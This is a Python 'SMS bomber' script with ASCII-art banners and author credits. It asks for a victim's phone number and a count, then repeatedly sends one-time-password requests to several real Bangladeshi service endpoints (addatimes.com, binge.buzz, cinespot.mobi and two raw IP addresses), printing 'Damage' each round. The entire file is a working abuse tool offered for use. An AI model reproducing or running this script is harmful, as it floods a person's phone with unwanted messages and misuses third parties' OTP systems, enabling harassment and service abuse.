import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _______ _    _ _  _____                                         
 |__   __| |  | (_)/ ____|                                        
    | |  | |__| |_| (___                                          
    | |  |  __  | |\___ \                                         
    | |  | |  | | |____) |                                        
   _|_|_ |_|  |_|_|_____/____   __  __                            
  / ____|      / ____|__   __| |  \/  |                           
 | (___  _   _| (___    | | ___| \  / |                           
  \___ \| | | |\___ \   | |/ _ \ |\/| |                           
  ____) | |_| |____) |  | |  __/ |  | |                           
 |_____/ \__, |_____/___|_|\___|_|  |_|                           
  / ____| __/ |     |__   __|                                     
 | |     |___/___  __ _| | ___  _ __                              
 | |    | '__/ _ \/ _` | |/ _ \| '__|                             
 | |____| | |  __/ (_| | | (_) | |                                
  \_____|_|  \___|\__,_|_|\___/|_|                                
 |  _ \                                                           
 | |_) |_   _                                                     
 |  _ <| | | |                                                    
 | |_) | |_| |                                                    
 |____/ \__, |                                                    
         __/ |                                                    
   __  _|___/ _____         _____ _    _       _  ___ ____   __   
  / / | |  | |  __ \       / ____| |  | |     | |/ (_)  _ \  \ \  
 | |  | |__| | |  | |_____| (___ | |__| | __ _| ' / _| |_) |  | | 
 | |  |  __  | |  | |______\___ \|  __  |/ _` |  < | |  _ <   | | 
 | |  | |  | | |__| |      ____) | |  | | (_| | . \| | |_) |  | | 
 | |  |_|  |_|_____/      |_____/|_|  |_|\__,_|_|\_\_|____/   | | 
  \_\                                                        /_/  
                                                                  """+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- ( HD-SHaKiiB ) ( GhOsToFKiinG ) ")


print ("""


   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝




""")

number  = str(input("[>] Heii Mr : SHaKiiB Sir. apNar aTTack NumBer DiN: "))


amount = int(input("[>] Sir apNar aTTack ar PoriMaN LikHuN: "))




url1 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers1 = CaseInsensitiveDict()

headers1["Content-Length"]="48"

headers1["Content-Type"]="application/json"

data1 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""

url2 = "http://45.114.85.19:8080/v3/otp/send?msisdn=88"+number

url3 = "https://ss.binge.buzz/otp/send/login"

headers3 = CaseInsensitiveDict()
headers3["Content-Type"] = "application/x-www-form-urlencoded"

data3 = "phone="+number

url4 = "https://www.addatimes.com/api/register-otp"

headers4 = CaseInsensitiveDict()

headers4["Content-Type"]= "application/json"

data4 = """{
  \"email\": \"msnrpp0165@detectu.com\",
  \"password\": \"\",
  \"confirmPassword\": \"\",
  \"terms\": true,
  \"phone\": \""""+number+"""\",
  \"country\": \"Bangladesh\"
}"""

url5 = "https://www.addatimes.com/api/login-otp"

headers5 = CaseInsensitiveDict()
headers5["Content-Type"] = "application/json"

data5 = """
{
  \"phone\": \""""+number+"""\"
}"""

url7 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"




for i in range(amount):
	try:
		resp1 = requests.post(url1, headers=headers1, data=data1)
		
		resp2 = requests.get(url2)
		
		resp3 = requests.post(url3, headers=headers3,  data=data3)
		
		resp4 = requests.post(url4, headers=headers4,  data=data4)
		
		resp5 = requests.post(url5, headers=headers5,  data=data5)
		
		resp7 = requests.get(url7)

		print(str (i+1)+" Damage \n")

	except:
		print ("Please Make Sure Your Internet Connection")